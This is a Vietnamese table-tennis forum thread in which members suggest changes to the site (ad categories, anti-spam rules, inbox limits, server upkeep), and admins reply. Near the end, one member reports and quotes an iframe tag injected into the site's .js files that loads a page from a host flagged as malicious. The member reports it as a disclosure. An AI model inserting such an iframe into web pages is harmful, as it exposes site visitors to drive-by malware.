Góp ý với BQT

jaypark

Trung Sỹ
Em thấy BQT đã tích cực đáp ứng được sự mong mỏi của anh em là tạo riêng ra từng mục Mặt vợt - Cốt vợt - Phụ kiện trong mục Rao vặt. Nhưng hiện nay là Mặt vợt cũ - Cốt vợt cũ. Theo em thì nên bỏ chữ "cũ" đi vì nếu em bán hàng mới 100% thì không thể gọi là hàng cũ được :eek:

Còn mục Phụ kiện thì nên đổi lại thành các mục khác như: Quần áo , Giày dép , Các phụ kiện khác.

Em có đôi lời góp ý ạ.

hoàn toàn nhất trí với quan điểm của Văn

chichkidao

Moderator
Cái này thì em đã góp ý với admin cùng BQT nhưng thấy admin nói cứ để cái Top Poster đấy cho sôi nổi thì em cũng chẳng còn gì để nói nhưng sôi nổi cái kiểu này thì em nghĩ chắc càng ngày càng ít người vào diễn đàn đọc và post bài nữa vì vào chỉ đọc chỉ toàn thấy ''uppppppp....'' là nhiều.em thấy diễn đàn mới này khắc diễn đàn cũ quá nhiều.
Và đồng thời xin lỗi 2 bác jaypark và meoluoitmb.tuy 3 anh em rất thân với nhau nhưng em cũng kính mong 2 anh hạn chế tình trạng trên để chất lượng diễn đàn được tốt hơn ạ.

zhang là vis

Đại Uý
Cái này thì em đã góp ý với admin cùng BQT nhưng thấy admin nói cứ để cái Top Poster đấy cho sôi nổi thì em cũng chẳng còn gì để nói nhưng sôi nổi cái kiểu này thì em nghĩ chắc càng ngày càng ít người vào diễn đàn đọc và post bài nữa vì vào chỉ đọc chỉ toàn thấy ''uppppppp....'' là nhiều.em thấy diễn đàn mới này khắc diễn đàn cũ quá nhiều.
Và đồng thời xin lỗi 2 bác jaypark và meoluoitmb.tuy 3 anh em rất thân với nhau nhưng em cũng kính mong 2 anh hạn chế tình trạng trên để chất lượng diễn đàn được tốt hơn ạ.

Nhất trí 10000% quan điểm của em Đạt... Jaypark cũng thế nhé

Em bây giờ cũng không vào mục rao vặt để viết bài nữa đâu ạ :) xin thề không up..cai nghiện up up up.....cố lên vì diễn đàn trong sạch,2 bác meoluoitmb và Jaypark nhé.( tha cho hội 9x tụi em luôn đi ạ =)) )

zhang là vis

Đại Uý
BQT ơi.cho em hỏi phần tin nhắn riêng ý ạ.có thể mở rộng hòm tin lên 100 tin được không ạ.chứ 50 tin thì ít quá.hơi tí là phải xóa ạ :)

admin

Administrator
Staff member

Bạn chichkidao yên tâm là BQT cũng như đa số thành viên diễn đàn đều không ủng hộ việc spam. Lỗi spam có thể bị nhắc nhở , cảnh cáo cho tới ban nick. Do thời gian này BQT cũng bận rộn nhiều việc khác nên chưa xử lý được hết các trường hợp spam thôi. Còn số lượng bài chỉ là một con số ảo thôi, không ai đánh giá thành viên qua số lượng bài viết đâu bạn ạ.

Cám ơn bạn đã góp ý.

admin

Administrator
Staff member
BQT ơi.cho em hỏi phần tin nhắn riêng ý ạ.có thể mở rộng hòm tin lên 100 tin được không ạ.chứ 50 tin thì ít quá.hơi tí là phải xóa ạ :)

Về kỹ thuật thì có thể được nhưng sẽ ngốn tài nguyên Diễn đàn, BQT sẽ trao đổi với bộ phận kỹ thuật và trả lời bạn sau nhé.

chichkidao

Moderator
Bạn chichkidao yên tâm là BQT cũng như đa số thành viên diễn đàn đều không ủng hộ việc spam. Lỗi spam có thể bị nhắc nhở , cảnh cáo cho tới ban nick. Do thời gian này BQT cũng bận rộn nhiều việc khác nên chưa xử lý được hết các trường hợp spam thôi. Còn số lượng bài chỉ là một con số ảo thôi, không ai đánh giá thành viên qua số lượng bài viết đâu bạn ạ.

Cám ơn bạn đã góp ý.

Vâng admin đã nói thế thì em cũng nhất trí.vì thực sự là số lượng bài viết,ai nhiều ai ít đối với em nó cũng không có ý nghĩa gì cả.nhưng việc spam liên tục có ảnh hưởng đến chất lượng bài của các chủ thớt,và cũng khiến nhiều topic bị trôi đi.thực ra em ko để ý gì đến cái tab Top poster của diễn đàn,ý em muốn bỏ nó và chỉ để Top Thanked là em mong muốn các thành viên cố gắng post bài sao cho nhận nhiều thanks,có như vậy chất lượng của diễn đàn mới ngày một cao và thu hút được nhiều người tham gia.mặt khác khuyến khích được nhiều người cố gắng post bài chia sé kinh nghiệm tâm huyết và chất lượng.
Em xin cảm ơn admin đã gửi tin phản hồi và góp ý với em.

hoanganhauto

Thượng Sỹ
Theo ý nghĩ cá nhân, sau khi đọc xong topic Post ít post nhiều và cũng qua thời gian qua thường xuyên theo dõi các bài viết của diễn đàn em có một số nhận định góp ý như sau:
1. Nhu cầu trao đổi trực tiếp của anh em ngay trên diễn là rất lớn ( ví dụ giống như yahoo mình chat chẳng hạn) vậy mình có nên thiết kế một box chat để mọi người cùng trò chuyện khi có nhu cầu không nhỉ?

2. Những bài rao vặt bán các dụng cụ bóng bàn, em thấy có rất nhiều bài up lên bị rất nhiều anh em phản đối. Có lẻ, mình đưa ra một quy định dành riêng cho mục này về: quy định nghiêm ngặt hơn số lượng bài up và viết không đúng vào chủ đề, những thành viên mua bán thường xuyên thì chỉ tạo một topic và update thường xuyên chẳng hạn ( như em thấy anh Thinhnguyen, boll-boll đã từng làm)....

3. BQT nên đưa ra một luật lệ cho những bài viết thế nào là đúng, không vi phạm tình trạng spam: viết đúng nội dung chủ đề, không dùng quá nhiều các dấu và chữ không ý nghĩa cho đủ 30 ký tự khi viết bài, các thành viên khi viết bài sẽ chịu trách nhiệm về bài viết của mình....Mình viết ra những điều lệ càng rõ ràng dễ hiểu thì anh em càng dễ đón nhận và khắc phục nhanh được tình trạng chưa hay.

Đây là nhận định cá nhân có rất nhiều thiếu sót, mong anh em góp ý thêm để BQT - Admin cùng các thành viên tìm ra nguyên nhân và khắc phục để diễn đàn ngày một văn minh lịch sự và khoa học hơn.
Thân mến!

admin

Administrator
Staff member
Theo ý nghĩ cá nhân, sau khi đọc xong topic Post ít post nhiều và cũng qua thời gian qua thường xuyên theo dõi các bài viết của diễn đàn em có một số nhận định góp ý như sau:
1. Nhu cầu trao đổi trực tiếp của anh em ngay trên diễn là rất lớn ( ví dụ giống như yahoo mình chat chẳng hạn) vậy mình có nên thiết kế một box chat để mọi người cùng trò chuyện khi có nhu cầu không nhỉ?

BQT sẽ tạo một box riêng cho anh chị em có nhu cầu chat chit

2. Những bài rao vặt bán các dụng cụ bóng bàn, em thấy có rất nhiều bài up lên bị rất nhiều anh em phản đối. Có lẻ, mình đưa ra một quy định dành riêng cho mục này về: quy định nghiêm ngặt hơn số lượng bài up và viết không đúng vào chủ đề, những thành viên mua bán thường xuyên thì chỉ tạo một topic và update thường xuyên chẳng hạn ( như em thấy anh Thinhnguyen, boll-boll đã từng làm)....

Nội quy quy định của diễn đàn cũng có cả nhưng rất nhiều thành viên không đọc. Chắc đợt tới phải hiển thj Nội quy lên chỗ nào đó mà ai cũng phải nhìn thấy. Nếu vi phạm thì sẽ xử lý thôi bạn à.

3. BQT nên đưa ra một luật lệ cho những bài viết thế nào là đúng, không vi phạm tình trạng spam: viết đúng nội dung chủ đề, không dùng quá nhiều các dấu và chữ không ý nghĩa cho đủ 30 ký tự khi viết bài, các thành viên khi viết bài sẽ chịu trách nhiệm về bài viết của mình....Mình viết ra những điều lệ càng rõ ràng dễ hiểu thì anh em càng dễ đón nhận và khắc phục nhanh được tình trạng chưa hay.

BQT mới post bài viết về spam để mọi người hiểu và có trách nhiệm hơn với bài viết của mình ở topic này nhé:

http://bongban.org/forum/showthread.php/2174-Th%E1%BA%BF-n%C3%A0o-l%C3%A0-spam-v%C3%A0-v%C4%83n-h%C3%B3a-n%C3%BAt-Thanks%21

Đây là nhận định cá nhân có rất nhiều thiếu sót, mong anh em góp ý thêm để BQT - Admin cùng các thành viên tìm ra nguyên nhân và khắc phục để diễn đàn ngày một văn minh lịch sự và khoa học hơn.
Thân mến!

Cám ơn bạn vì những góp ý xây dựng.

trin_hoa_an

Trung Uý

Thân mến!

Box chat theo mình thì ko nên vì khi chat sẽ tạo tâm lý làm biếng viết bài như vậy sẽ thành thói quen, vì ko có những topic mới chất lượng. Cái nữa là sẽ tốn thêm tài nguyên diễn đàn.

Theo em cái quan trọng tập trung nâng cấp chất lượng diễn đàn như việc bảo mật chống hack, tốc độ load.. như vậy sẽ hay hơn.
Trên diễn đàn em thấy có nhiều ng giỏi về IT nên tận dụng những ý kiến của họ. Vì để tránh có những sự cố ngoài ý muốn như đợt vừa rồi.

dungkinh

Thượng Sỹ
đề nghị không cắt bỏ mục tìm bài viết mới (tự nhiên thấy mất đi nội dung : tìm bài viết mới )

NTBB

Super Moderators
Hôm nay diễn đàn đã hoạt động trở lại. Nhưng mình thấy vẫn còn 1 số lỗi, không hiểu ace khác có gặp không:
- Không chuyển màn hình chính sang các tab khác được (chẳng hạn nhấn tab "rao vặt" nhưng màn hình không chuyển sang đó).
- Khi trích dẫn các bài nào đó vào bài viết của mình thì trong ô soạn thảo toàn là ký tự số, chữ xen lẫn loằng ngoằng ko đọc được (tuy khi soạn bài xong, gửi lên thì vẫn bình thường).

Không hiểu những lỗi này là do diễn đàn chưa hoàn chỉnh hay do riêng máy tính mình bị nhỉ?

ping80

Trung Uý
admin trỏ tên miền bongban.org về IP mới là ok, thay vì để ip http://112.213.94.89/forum/....
Server mới hình như đang xài OS 32bit, nếu có thể xài OS 64bit thì performance sẽ tốt hơn.
định kỳ cũng phải update các bản patch OS , Web Server, AntiVirus, forum.

Luôn luôn phải backup sourcecode forum+CSDL hàng ngày, đảm bảo có bản backup được lưu trữ ra bên ngoài định kỳ (khỏi nơi đặt máy chủ) .

NTBB

Super Moderators
Mình đang ở mục bên lề bóng bàn nhưng không làm sao trở lại mục thông tin chính. Back không được !

Anh em mình "cùng cảnh ngộ" rùi ! Đành chờ các bạn KT khắc phục vậy . Mình "tự khắc phục" bằng cách mò thẳng vào các threat và topic cần vào ở phía dưới.

ping80

Trung Uý
Rất nhiều file .js code có chèn iframe :

"<iframe src="http://testingbooth.ru/shakesduplicates.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>"

mà site http://testingbooth.ru/ bị rất nhiều hãng bảo mật list vào URL contains malicious software

Bình luận từ Facebook